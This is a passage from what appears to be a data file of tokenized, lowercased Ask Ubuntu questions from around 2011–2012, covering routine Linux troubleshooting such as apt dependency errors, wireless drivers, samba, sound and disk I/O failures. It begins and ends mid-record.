capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:44 ioport:2000 ( size=256 ) memory : f050c000-f050cfff memory : f0508000-f050bfff and here is the output of lsmod module size used by snd_hrtimer 12648 1 bnep 17923 2 rfcomm 38408 8 parport_pc 32114 0 ppdev 12849 0 joydev 17393 0 arc4 12473 2 snd_hda_codec_realtek 254125 1 binfmt_misc 17292 1 samsung_backlight 13487 0 uvcvideo 67271 0 videodev 85626 1 uvcvideo snd_hda_intel 24262 2 snd_hda_codec 91859 2 snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec snd_pcm 80435 2 snd_hda_intel , snd_hda_codec btusb 18160 2 snd_seq_midi 13132 0 bluetooth 148839 23 bnep , rfcomm , btusb psmouse 73673 0 serio_raw 12990 0 snd_rawmidi 25241 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51567 3 snd_seq_midi , snd_seq_midi_event snd_timer 28932 3 snd_hrtimer , snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq iwlagn 273980 0 mac80211 393421 1 iwlagn i915 509519 2 snd 55902 14 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_t imer , snd_seq_device drm_kms_helper 32889 1 i915 drm 192194 3 i915 , drm_kms_helper cfg80211 172427 2 iwlagn , mac80211 i2c_algo_bit 13199 1 i915 soundcore 12600 1 snd video 18908 1 i915 snd_page_alloc 14115 2 snd_hda_intel , snd_pcm lp 17455 0 parport 40930 3 parport_pc , ppdev , lp ahci 21634 2 libahci 25727 1 ahci r8169 43104 0
107903	mouse pad freezes	i have an acer aspire running net book remix 11.10. the mouse pad freezes up completely and i must use an external mouse . if i reboot the computer the mouse pad will work again . i seem to have this problem happen in the middle of either using firefox or a few time while using thunderbird . anyone else having this problem . an external mouse works but scrolling is choppy or it scrolls part of the way down a page and then jumps to the top again . i do n't recall having this problem after upgrading to 11.10 so i think it is related to an update . my linux skills are limited .
107905	how can i remove all of the plugins from firefox ?	i want to remove all plugins from firefox , until now i have only had success with removing all addons . ( i do n't mind if i have to reinstall firefox to achieve this ) how can i remove all of the plugins from firefox ?
107906	could anybody recommend me some games for my kid in ubuntu ?	i have installed tuxpaint , supertuxkart but would like to know which games are good for my kid who is 3 years old and likes to play games in computer very much . thank you .
107907	enable web search in gnome-shell	unfortunately i disable gnome-shell web search option with the following command gsettings set org.gnome.shell disabled-open-search-providers `` [ 'google.xml ' , 'wikipedia.xml ' ] '' how to re-enable it ? also how can i change the default search . default gnome-shell search in wikipedia . i need to search in google by default . thanks in advance
107908	installed from live usb - but now 'no boot device available '	on a dell dimension 9150 , i 've been trying to install 11.10 from a live usb . ubuntu runs fine from the live usb . on the first install , it failed at the last step , 'unable to write bootloader ' to the selected partition , please select another partition . there were 2 sata hds in raid and in case that was causing the installer some problems , i disabled raid and disconnected one of the sata drives ( as well as disabling that sata channel in bios ) . went back to the start of the installation , and everything seemed to go smoothly . got to the reboot point , and removed the install media as instructed . but when it rebooted , it gives this 'no boot device available ' error when it tries to boot from the hard drive . any suggestions , please ?
107911	installing ubuntu on windows 7	after installing ubuntu on windows 7 , does it looks like ubuntu have been installed on a virtual machine ? thanks
107914	in what program was this official ubuntu ad made in	i have previously stumbled upon the official 10.10 uds ad : what program was this ad made in ? is the program on ubuntu ? is there a template ?
107915	how do i download and install handbrake ?	i 'm new at ubuntu so i do n't know very well how to use the terminal in order to download and install programs that are n't in the software center . i 've tried without success downloading and installing handbrake . could anybody help me , guiding me through the downloading and installation of handbrake ?
107922	home folder does n't update or show newly added users	i am having a very big problem and that is , whenever i add a new user ( via command line with adduser krishna command ) the user is created but it 's home folder or it 's own private folder is n't created but some times it works ( tried 15 times worked 3 times ) so please can anyone help me out . one more thing it creates the user account but does n't create it 's folder , please help me am a newbie in ubuntu . output : - nothing just the newline & waiting for the next command..when it did n't create any folder , but when the folder was too created , it asked for unix password , retype password , full name , work , and 2 more options .
107925	unity-panel apps running in the background	i noticed that some of my apps are in the background in unity-panel . the apps are vmware-workstation , jupiter , empathy this is what i mean as you can see on the left some of my apps are running but in the background if i did n't set my unity-panel to see-through i would n't have noticed it . if i restart my laptop and start empathy it does n't go in the background and also when i run compiz -- replace the apps are back in the foreground this happens a lot when i am working my apps are suddenly in the unity-panel background ?
107929	apt-get upgrade and apt-get update are now broken for me in 10.04	for some reason upgrade and update are now broken in ubuntu 10.04 lts ~ $ sudo apt-get update e : malformed line 5 in source list /etc/apt/sources.list.d/akirad.list ( dist parse ) ~ $ sudo apt-get upgrade e : malformed line 5 in source list /etc/apt/sources.list.d/akirad.list ( dist parse ) e : the list of sources could not be read . here is the file it says line 5 is screwed up in # # akirad repository for ubuntu # # please report any bug on akir4d at gmail.com # # ppa deb http : //ppa.launchpad.net/akirad/akirad/ubuntu main # akirad repository - main deb http : //ppa.launchpad.net/akirad/ppa/ubuntu main # akirad repository - main # deb-src http : //ppa.launchpad.net/akirad/akirad/ubuntu main # akirad repository sources- main # deb-src http : //ppa.launchpad.net/akirad/ppa/ubuntu main # akirad repository sources- main what is wrong with the link deb http : //ppa.launchpad.net/akirad/akirad/ubuntu main # akirad repository - main in line 5 ?
107932	what other distributions provide the option to install inside windows ?	i mean installing with something like wubi ? can fedora do this ?
107934	how can i make a hidden file/folder ?	i 'm using ubuntu 11.10 and i want to make a file hidden . how do i make for example a .docx file or a directory hidden ? please put a way to do it with and without the terminal ?
107938	what are the benefits/problems about upgrading python to a newer version	what advantages and disadvantages does upgrading python to a newer version not available in the distro bring . for example , upgrading from 2.6/2.7 to 3.1/3.2 . since there are several questions relating to problems because of this , or a necessary to do this i thought it would just help in concentrating the benefits and problems associated with upgrading python to a new/older release .
107943	ubuntu 11.10 does n't see partitions	i have some problem . when i bought my laptop ( few months ago ) - suse linux enterprise desktop was installed on it . then i 've done the dualboot with windows 7 . and now i want to setup ubuntu 11.10 on my laptop . but during the installation , when i must to choose the partitions etc - installer does n't see my partitions . i mean , that when ubuntu asks how to configure partitions i choose manually configuring . if i try to boot livecd ( with this dvd ) - ubuntu can see partitions on fisk -l. but installer ca n't see them ... what 's the problem ? ( why did it happen ? ) how can i fix that without installation at least my windows ?
107945	ca n't add more than four keyboard layouts	i ca n't add more than 4 keyboard layouts on my ubuntu . it just wo n't let me add more . and i in need of at least 4 more . anyone else encountered this problem and can give me some advice ? thanks in advance : )
107951	how to set a specific window size for all windows that open to default	i want my windows to be a specific size ( not full screen ) and to be in the middle of the screen by default . when i close the application and re-open it , it will be the dimensions i want it to be by default . is there an easy way to do that ? i 'm using ubuntu 11.10 and the unity desktop enviroment .
107953	automatically realign partitions from script in command line	i 'm working on a really really wierd project . i 'm using ubuntu to recover an android device . i 'm doing this by launching ubuntu and then using the gui to keep the user informed . i need to figure out a way to realign the partition tables . when using parted -l print , parted shows that there are problems on the disk and asks for user input to correct the partition table endings . is there another tool that i can use for a scripted recovery ? basically , the partition tables at this point are correct , but the disk is in an unknown state . i need to figure out a way to rewrite the partition table endings on the disk .
107957	mplayer does not work anymore and i do n't know why or what happend	whenever i try and sue mplayer it says : mplayer : relocation error : mplayer : symbol ff_codec_bmp_tags , version libavformat_53 not defined in file libavformat.so.53 with link time reference what do i do to fix this ?
107963	failed application install seems to have corrupted apt-get , how do i force it to forget ?	my htpc is running ubuntu 11.04 and i tried installing boxee a while back . i got it to install , but everytime i try to use apt-get now , it says : $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : boxee : depends : libxmlrpc-c3 but it is not installable e : unmet dependencies . try using -f. if i run apt-get -f install it prompts me to uninstall boxee . now , boxee is installed and very functional , i do n't wish to uninstall it . how do i essentially make apt forget about boxee and libxmlrpc-c3 ? edit : the output of apt-cache policy boxee is : $ apt-cache policy boxee boxee : installed : 0.9.22.13692 candidate : 0.9.22.13692 version table : *** 0.9.22.13692 0 100 /var/lib/dpkg/status edit : solution -- as suggested , i apt-get -f install 'd , it removed boxee . i then re-installed and everything is working well .
107969	what is the difference between `` source x '' , `` . x '' and `` ./x '' in bash ?	i have one bash source run.sh as follows , # ! /bin/bash if [ $ # -ne 1 ] ; then exit fi ... when i execute it in two ways , there are different behaviors . the first way is , source run.sh it will close the terminal after execution . the second way is , ./run.sh this will simply finish running the script , and stay on the terminal . i am asking if there is a command for exiting a bash scripts for both source run.sh and ./run.sh execution . i have tried return too , which does not work well under ./run.sh execution . more generally , i am interested in why this is happening , and what 's difference between using `` source '' and `` . '' for script execution ?
107985	how do i fix these package dependency issues ?	i ca n't install anything right now ( or upgrade anything ) . when i run `sudo apt-get upgrade i get this list of unmet dependencies . at the end it says e : unmet dependencies . try using -f. when i try sudo apt-get upgrade -f i get reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following new packages will be installed : gcc-4.6-base libacl1 libasound2 libasound2-plugins libasyncns0 libatk1.0-0 libattr1 libaudio2 libavahi-client3 libavahi-common-data libavahi-common3 libc6 libcairo2 libcomerr2 libcups2 libcupsimage2 libcurl3 libdatrie1 libdb5.1 libdbus-1-3 libdbusmenu-qt2 libdrm-intel1 libdrm-nouveau1a libdrm-radeon1 libdrm2 libexpat1 libffi6 libflac8 libfontconfig1 libfreetype6 libgcc1 libgcrypt11 libgdbm3 libgdk-pixbuf2.0-0 libgl1-mesa-dri libgl1-mesa-glx libglapi-mesa libglib2.0-0 libgnutls26 libgpg-error0 libgssapi-krb5-2 libgtk2.0-0 libice6 libidn11 libjack-jackd2-0 libjasper1 libjpeg62 libjson0 libk5crypto3 libkeyutils1 libkrb5-3 libkrb5support0 liblcms1 libldap-2.4-2 libllvm2.9 libmng1 libnspr4 libnspr4-0d libnss3 libnss3-1d libogg0 libpango1.0-0 libpciaccess0 libpcre3 libpixman-1-0 libpng12-0 libpulse0 libqt4-dbus libqt4-declarative libqt4-network libqt4-opengl libqt4-script libqt4-sql libqt4-svg libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 librtmp0 libsamplerate0 libsasl2-2 libsasl2-modules libsdl1.2debian-alsa libselinux1 libsm6 libsndfile1 libspeexdsp1 libsqlite3-0 libssl1.0.0 libstdc++6 libtasn1-3 libthai0 libtiff4 libuuid1 libvorbis0a libvorbisenc2 libwrap0 libx11-6 libxau6 libxcb-render0 libxcb-shm0 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxdmcp6 libxext6 libxfixes3 libxft2 libxi6 libxinerama1 libxrandr2 libxrender1 libxss1 libxt6 libxv1 libxxf86vm1 zlib1g the following packages will be upgraded : myunity 1 upgraded , 118 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/43.5 mb of archives . after this operation , 144 mb of additional disk space will be used . do you want to continue [ y/n ] ? y e : could not perform immediate configuration on 'libc6 ' . please see man 5 apt.conf under apt : :immediate-configure for details . ( 2 ) nothing happens though . i do n't really know what 's going on , or how to troubleshoot this . i looked at man 5 apt.conf under immedate-configure , but it did n't really tell me anything . i 'm kind of skeptical that all these things need to be installed . i think there 's just an error reading some package list or something , so it does n't know what 's installed or not . but i could be wrong about that . how can i fix these dependency issues ?
107986	no track info after burning cd on banshee	using banshee , i ripped songs from a cd and added them to my library . then i added the track information to each song , and burned them to a new cd . the problem is that after doing all of that , the new cd still showed `` unknown '' for the all of the songs , artist and album . i am using ubuntu 11.04 .
107987	how to add shortcut to unity launcher programmatically ?	i 'm developing a program in qt that will help users to manage ( create , edit and delete ) their quicklists in unity launcher . i got to a point where i created .desktop file and i do n't know how to programmatically place that file on unity launcher . i found two ( bad ) ways to do this : manually drag and drop created .desktop file to unity launcher edit favorites key with `` gsettings set com.canonical.unity.launcher favorites '' and force unity to reload with `` unity -- replace '' so , i 'm searching for a function or a system command that is called on first 'drag and drop ' method so i can do it in my program without need for user to do it manually . i do n't even know where ( or how ) to search for my solution so any suggestions will be helpfull .
107988	atheros ar242 wireless not working	just did a clean install of 11.10 on a new ssd . and i ca n't turn on wi-fi . used google and found a number of answers pointing towards interference with acer_wmi ( here for instance ) . so i blacklisted that driver and rebooted . still no go . i go to wi-fi and i can flip the switch to `` on '' but it is not orange and it snaps immediately back to off . this is on a compaq presario cq50 . i note that it has an illuminated wi-fi button right next to the power button . pushing this has no effect , the light does n't toggle . the wi-fi did work ( under windows ) until the hard drive crashed . here is iwconfig output : pk @ alot_of_ocelot : ~ $ iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off i am happy to post anything else , but as i too am a n00b at ubuntu , not sure what would be useful . reddit gold for anyone who can help me !
107994	restore vlc 1.x functionality after installing vlc 2.x	for several users , installing vlc 2.0 from it 's ppa will result in multiple problems with the system , including but not limited to : openshot not working devede not working pitivi not working sound problems similar video tools having problems how to fix this ?
108000	how to remove shortcut key created with ubuntu tweak ?	not much time after i installed my ubuntu , i installed ubuntu tweak and added shortcut keys for the applications i used most . however , i wanted to remove a shortcut key and was not able to ( the last one ) . at least , i could n't figure out a way to do that . i want to reconfigure them using ubuntu 's keyboard tool , so i do n't mind if i have to delete all shortcut keys from ubuntu tweak . does anyone know how to do that ?
108001	prevent user from executing a shell command	how can i prevent a none root user to executes e.g . the passwd command in terminal ?
108004	does wakealarm have a graphical frontend ?	is there anybody who know a gui for wakealarm for linux ? i know it 's very easy to set it up by cli , but i think that 's not the `` ubuntu way '' of doing things . so is there a gui or is it an issue for brainstorm ?
108006	why do n't etron usb 3.0 controllers/ports work ? ( asus p8z68-v and other motherboards )	i have a new computer with an asus p8z68-v le + intel 2500 + 8gb of ram . i installed ubuntu without any issue but the usb3 ( from the mother board - on the back of the computer ) do n't work . i plug a usb stick noting , i plug my usb3 external drive nothing , but when i plug them in the usb2 everything works perfectly . i ran all updates also and everything is up to date . what am i missing ?
108008	the new qt gui for existing applications will be integrated with the ayatana overlay scrollbars ?	with the last updates in ubuntu 12.04 at least two new gui in qt for existing applications are landed : ubuntu one control panel , and checkbox ( the system testing tool ) . these new guis are pretty good , but they do n't include the ayatana scrollbars like the other gtk applications . i wonder if it is planned to apply the ayatana scrollbars also for the qt gui , or not . i mean , that these new guis are a good , but so far they introduce a bit of incoherence in the unity desktop experience . so far , we already have some applications , like chromium or libreoffice , that do n't recognize the ayatana scrollbars , but at least , all the rest of the gtk applications are coherent .
108009	ubuntu wo n't boot into graphical mode , it shows text mode with comands	i 've tried many times to install ubuntu 11.10 in that computer but every time i install ubuntu , after it finishes to install amd reboot , instead of getting to graphical mode i see black screen with commands and i can write there . tahnks ! ( :
108011	the `` repository '' howtos and standards	i 'm obliged to maintain a daily-updated offline ubuntu repository , that should be signed by my digital signature and be in a standard format . i usually do dpkg-scanpackages -m . > ./packages in my repo folder to create local repositories ( and never sign anything ! ) . are there any standards to create and maintain a debian / ubuntu repository ? i can see that almost all archive sites are in same format . they have different directories for .deb files and indexes . also they have different architectures and distributions ( pool , dist , ... ) i would like to know how to make a standard repository .
108015	update manager updating process results in error in 10.04	i keep getting a red x icon in my notification area . this started a few weeks ago when doing the normal updating process with update manager . i decided now i have to ask this question to figure what is wrong . here is the error message update manager provided in the pop up upon completion e : /var/cache/apt/archives/python-lazr.restfulclient_0.9.11-1ubuntu1.3_all.deb : subprocess new pre-removal script returned error exit status 1 e : /var/cache/apt/archives/update-manager_1 % 3a0.134.11.2_all.deb : subprocess new pre-removal script returned error exit status 1 e : /var/cache/apt/archives/update-manager-core_1 % 3a0.134.11.2_amd64.deb : subprocess new pre-removal script returned error exit status 1 e : /var/cache/apt/archives/update-manager-kde_1 % 3a0.134.11.2_all.deb : subprocess new pre-removal script returned error exit status 1 and here is a screen shot update : details of the error from terminal ok . it 's super long . so long i could not paste it in here . part 1 & part 2
108017	change default scan program in indicator-session-applet	i 'd like to remove the default scan program simple scan which is called in the indicator-session applet , and replace it with my favorite scan program , xsane . i ca n't find any hints how to achieve that . when simple scan is removed from the computer , ubuntu wants me to reinstall it via software center . where and how could i change that ? so long hanky edit i think i found a solution after examining the source code . the only way to change it seems to be a recompling of the package after editing src/device-menu-mgr.c and replacing all occurences of 'simple_scan ' with 'xsane ' there . i really ca n't believe this is hard-coded - no choice for the user ...
108023	how to insert countdown into a video file	is there an easy way to insert a big countdown clock after a given time position of a video file in linux ? the countdown clock should count down in seconds from n to 0 . edit : i do n't want to insert manually pictures showing the nth second . it is clear to me how to do that . what i want is an automatic way to do this : set the number of seconds for the countdown ( e.g . 64 or 80 seconds ) set the time where to insert the countdown in a given video and finally get the video with inserted countdown at specified position as a result . it would be nice if this would be possible in a graphical video editor like openshot . however it would also be ok to have a command line solution for this .
108028	no sound devices listed under hardware , no sound ( one user account specific problem )	update : loged in as guest and all works as charm . using my account ( administrator ) nothing works and i am not able to locate advanced user management options : ( first of all - i use usb headset . there were some troubles with recognition at first , but prestigio were listed under hardware , so i activated it and all worked . now after i had to unplug headset and restart lappy , there is no sound devices at all listed under hardware tab . i cant adjust volume there . there is sound from built in speakers , but not from headset . alsamixer shows me both built in audio card and prestigio ( headset ) . i can choose them , but after esc and leaving alsa it rolls back to `` default '' following this thread , there are no audio devices listed under hardware tab of audio preferences as a result no sound i gathered this info audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 03 ) subsystem : acer incorporated [ ali ] device 011e flags : bus master , fast devsel , latency 0 , irq 47 memory at 98400000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : hda intel kernel modules : snd-hda-intel but solution offered ( try killall pulseaudio ; rm -r ~/.pulse* from terminal and logout or reboot ) gave this result pulseaudio : no process found rm : remove write-protected regular file `/xxxxxx/.pulse/a336866c5ace61b2c9bc648a0000004f-runtime ' ? rm : can not remove `/xxxxxxx/.pulse ' : directory not empty i am at lost now . multiple restarts with headset on and off have not yielded any other results . any suggestions ? this is my first time using ubuntu and i am at best confident user in windows , so my own knowledge is quite lacking on issue ... update : aplay -l gives this as result . **** list of playback hardware devices **** failed to stat runtime directory /home/rizjaa/.pulse/a336866c5ace61b2c9bc648a0000004f-runtime : invalid argument card 0 : intel [ hda intel ] , device 0 : alc268 analog [ alc268 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : prestigio [ prestigio ] , device 0 : usb audio [ usb audio ] subdevices : 1/1 subdevice # 0 : subdevice # 0
108029	how to stop screensavers when playing a video ?	i 'm on lubuntu and am using the default video player to play videos , but if i leave the mouse unmoved for too long the screensaver cuts in while i 'm watching the video . how do i go about disabling the screensaver only while a video is playing ? ideally i 'd like this to be done automatically , rather than something i need to manually do . if this is n't an option in the default video player but is in others , i 'm willing to switch my utility of choice . further info : turns out that caffeine does n't actually seem to work on lubuntu . the screensaver still comes on , even though i 've configured caffeine as such and its context menu indicates that the screensaver should be disabled ( by showing the first option as `` enable screensaver '' ) .
108033	ubuntu user statistics sources and tools for stats	i am looking for ubuntu information about an estimate of how many ubuntu users exist . this includes all versions of ubuntu like xubuntu , lubuntu , kubuntu and the rest of the supported one . what pages or place where i can see information about existing users . additionally what tools can be used by users to be involved in this statistics .
108034	can we have mac like 'labels ' on unity ?	is there any app that could set label color for individual file/folder like in mac os x ?
108035	writing indicators with python , gir and gtk3	i 'm writing an application that needs to use an indicator . i 've done this in the past using pygtk and gtk2 , using as reference this document : https : //wiki.ubuntu.com/desktopexperienceteam/applicationindicators # python_version however , that only works with pygtk and gtk2 . things have changed since then , and i need to find some good documentation , a tutorial or a good example to learn how it works . also , one thing that the previously mentioned document does n't describe at all , is how to add sub-menus to an indicator . i hope someone can shed some light on this , as well as how to integrate with category indicators if that 's done using the same tool . thanks .
108036	how do i configure a ricoh mp c2050 ( multifunction ) fax to work	i 'm running ubuntu 11.10 and have a ricoh c2050 connected via network . printing works fine but i 'm not able to configure it that fax works . i can not find anything that looks as a fax setting . is my driver wrong ?
108037	weird menu icons after change the theme	i just changed my theme , and now , when i maximize firefox , my icons look weird like this this is my theme configuration any ideas guys ? thanks in advance
108040	samba needs additional restart on reboot ?	so when i first boot or reboot , smbd and nmbd are running but my shared folders are n't available . after a sudo service smbd restart everything is fine . my configuration is simple , using the local workgroup without winbind and there are n't any errors in log. ( s|n ) mbd . any ideas on how i can get rid of this additional restart ? here 's my smb.conf and i 'm not sharing from a home dir or an encrypted partition . [ global ] workgroup = workgroup server string = % h server ( samba , ubuntu ) dns proxy = no interfaces = lo eth0 hosts allow = 127.0.0.1 192.168.1.0/24 192.168.2.0/24 bind interfaces only = true client ntlmv2 auth = yes log file = /var/log/samba/log. % m max log size = 1000 syslog = 0 panic action = /usr/share/samba/panic-action % d security = share guest account = nobody encrypt passwords = true passdb backend = tdbsam obey pam restrictions = yes unix password sync = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s* ... pam password change = yes map to guest = bad user usershare allow guests = yes [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes guest ok = no read only = yes create mask = 0700 [ print $ ] comment = printer drivers path = /var/lib/samba/printers browseable = yes read only = yes guest ok = no [ media ] comment = media path = /media/archive_a browseable = no read only = yes guest ok = yes [ firefly ] comment = firefly path = /usr/local/firefly browseable = no read only = no guest ok = yes
108043	how can i convert my flac music collection to apple lossless ?	i have a reasonable sized music collection that i keep in flac format on my ubuntu laptop . i 'd like to start playing this music on my mac , and to sync it from there to my ipod . people have suggested that the best way to do this is to convert my collection to alac , and i 've decided that 's what i want to do . before i dive in and write custom shell scripts that call ffmpeg through some complex find command , i thought i 'd ask for advice . how can i best convert my existing flac collection to alac , without any loss of audio quality and preserving all of the metadata ?
108044	download and install proprietary wireless driver	i successfully installed 10.04 lts on my dell mini 9 , but could not wirelessly access the internet , so i went to `` hardware drivers '' but there were no proprietary drivers listed . this surprised me , because when i ran 11.10 off a usb drive , i could install the driver and get wireless internet access . ( 11.10 wo n't install on my 3.8-gb hard drive . ) my thought is to : ( 1 ) identify the appropriate driver , ( 2 ) download it off the internet onto my windows computer , ( 3 ) load the driver onto a usb drive , ( 4 ) plug that usb drive into my mini 9 , ( 5 ) take any steps necessary to get my system to see the driver ( in the `` hardware drivers '' window ) ( by copying off the usb drive to somewhere on the system ? ) , ( 6 ) go through the process of activating that driver , and ( 7 ) successfully connect wirelessly to the internet . does the above process make sense ? can it be done ? if so , how ? or is there an alternate approach like this that would work ? i 've looked at similar questions and answers on this forum and they all look like they apply to something different . right now , my 10.04 installation is not giving me wireless internet access , and the only physical connection possible is a usb drive ( to `` feed '' it a driver or whatever it needs to establish wireless connectivity ) . i get in over my head quickly when typing commands , and am fairly new to ubuntu . can anyone help , or do i need to go back to square one and try some entirely different ubuntu installation ? thank you very much for your help !
108051	how do i add a new vsftpd user ? ( not working )	i am trying to make a new vsftpd user but there apears to be a lack of documentation explaing how to make a new user + pass and assign them to a specific directory . does anyone perhaps know a simple way to doing this ? at the moment i just created a new user and this is my vsftpd.conf file but i get 530 login authenication error listen=yes anonymous_enable=no local_enable=yes virtual_use_local_privs=yes write_enable=yes connect_from_port_20=yes secure_chroot_dir=/var/run/vsftpd pam_service_name=vsftpd guest_enable=yes user_sub_token= $ user local_root=/var/lib/ chroot_local_user=yes hide_ids=yes listen_port=201
108060	is it possible to add custom items to system settings window ?	for example , how to add a `` startup applications preferences '' launcher to this window ?
108061	ubuntu how to edit files using graphical interface w/o being root ?	i have ubuntu setup on a vm and want to edit some apache configs , but it 's requiring that i am root . i can do this using 'sudo ' in terminal , but i want to just edit by double clicking and saving - via the gui . is there anyway to set privileges so i can do this ? thank you !
108065	how do you make the keyboard brightness button adjust at smaller intervals ?	i have a lenovo thinkpad t60 running oneiric . according to the files in /sys/class/backlight , i should be able to adjust the brightness level to a number between 0 and 7 ( and i am able to do this successfully in terminal using echo 4 > /sys/class/backlight/acpi_video0/brightness ) . however , when using the keyboard button ( fn+home , fn+end ) , the brightness levels adjust by increments of three . for example , if the brightness is all the way up at 7 and i press the button once , it lowers to 4 , then again to 1 , then 0 . i would like to change this so that it changes in increments of 1 . e.g . it starts at 7 , lowers to 6 , then 5 , and so on . ideas ?
108067	how to access files on ubuntu partion from windows xp ?	i 've installed ubuntu using the wubi . now i 've windows xp sp3 and ubuntu running on the same machine . i want to access all the files that are on the ubuntu partition , when i am using windows xp . how can i do it ?
108069	root filesystem randomly remounts itself as readonly after a few hours ( fresh install 11.10 )	the root filesystem itself randomly read-only ( usually about 3-4hrs after reboot ) and needs to be restarted to be able to work again . i 've done a fresh install after the problem first appeared after an update but the same problem still exists . what information about the system do you need to help ? it 's a 64-bit os and the root file system resides on an ssd . i 've run fsck checks on the file system ( even after i reformatted the drive ) . i 've also looked at the smart data and it looks good . i 'm usually able to find solutions to my problems with google but i was n't able to this time . thanks for all the help . output of dmesg at the time of the error : [ 3633.888132 ] ata2.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x6 frozen [ 3633.888144 ] ata2.00 : failed command : flush cache [ 3633.888159 ] ata2.00 : cmd e7/00:00:00:00:00/00:00:00:00:00/a0 tag 0 [ 3633.888162 ] res 40/00:00:00:4f : c2/00:00:00:00:00/00 emask 0x4 ( timeout ) [ 3633.888169 ] ata2.00 : status : { drdy } [ 3633.888179 ] ata2 : hard resetting link [ 3643.908112 ] ata2 : softreset failed ( device not ready ) [ 3643.908124 ] ata2 : hard resetting link [ 3653.928109 ] ata2 : softreset failed ( device not ready ) [ 3653.928121 ] ata2 : hard resetting link [ 3664.500117 ] ata2 : link is slow to respond , please be patient ( ready=0 ) [ 3688.932102 ] ata2 : softreset failed ( device not ready ) [ 3688.932115 ] ata2 : limiting sata link speed to 3.0 gbps [ 3688.932122 ] ata2 : hard resetting link [ 3694.124121 ] ata2 : softreset failed ( device not ready ) [ 3694.124132 ] ata2 : reset failed , giving up [ 3694.124138 ] ata2.00 : disabled [ 3694.124146 ] ata2.00 : device reported invalid chs sector 0 [ 3694.124164 ] ata2 : eh complete [ 3694.124286 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.124292 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.124301 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 00 11 79 5f 00 04 00 00 [ 3694.124319 ] end_request : i/o error , dev sda , sector 1145183 [ 3694.124329 ] buffer i/o error on device sda2 , logical block 80896 tons of these errors ... [ 3694.125102 ] buffer i/o error on device sda2 , logical block 81023 [ 3694.125111 ] ext4-fs warning ( device sda2 ) : ext4_end_bio:258 : i/o error writing to inode 915749 ( offset 0 size 524288 starting block 143275 ) [ 3694.125135 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.125139 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.125147 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 00 11 7d 5f 00 04 00 00 [ 3694.125164 ] end_request : i/o error , dev sda , sector 1146207 [ 3694.125170 ] buffer i/o error on device sda2 , logical block 81024 tons of these errors ... [ 3694.125939 ] buffer i/o error on device sda2 , logical block 81151 [ 3694.125947 ] ext4-fs warning ( device sda2 ) : ext4_end_bio:258 : i/o error writing to inode 915749 ( offset 524288 size 524288 starting block 143403 ) [ 3694.125964 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.125969 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.125976 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 00 11 81 5f 00 03 40 00 [ 3694.125991 ] end_request : i/o error , dev sda , sector 1147231 [ 3694.125998 ] buffer i/o error on device sda2 , logical block 81152 more of these same buffer i/o errors ... [ 3694.126618 ] buffer i/o error on device sda2 , logical block 81255 [ 3694.126626 ] ext4-fs warning ( device sda2 ) : ext4_end_bio:258 : i/o error writing to inode 915749 ( offset 1048576 size 425984 starting block 143507 ) [ 3694.126641 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.126645 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.126653 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 01 14 4e 67 00 00 50 00 [ 3694.126668 ] end_request : i/o error , dev sda , sector 18108007 [ 3694.126674 ] buffer i/o error on device sda2 , logical block 2201249 more of the same types of errors ... [ 3694.126728 ] buffer i/o error on device sda2 , logical block 2201256 [ 3694.126738 ] ext4-fs warning ( device sda2 ) : ext4_end_bio:258 : i/o error writing to inode 915753 ( offset 0 size 32768 starting block 2263508 ) [ 3694.126747 ] buffer i/o error on device sda2 , logical block 2201257 [ 3694.126754 ] buffer i/o error on device sda2 , logical block 2201258 [ 3694.126762 ] ext4-fs warning ( device sda2 ) : ext4_end_bio:258 : i/o error writing to inode 915754 ( offset 0 size 8192 starting block 2263510 ) [ 3694.126776 ] sd 1:0:0:0 : [ sda ] unhandled error code [ 3694.126781 ] sd 1:0:0:0 : [ sda ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 3694.126788 ] sd 1:0:0:0 : [ sda ] cdb : write ( 10 ) : 2a 00 01 14 4e b7 00 00 08 00 [ 3694.126804 ] end_request : i/o error , dev sda , sector 18108087 [ 3694.126811 ] buffer i/o error on device sda2 , logical block 2201259 [ 3694.126827 ] ext4-fs warning ( device sda2 ) : ext4_end_bio:258 : i/o error writing to inode 524657 ( offset 0 size 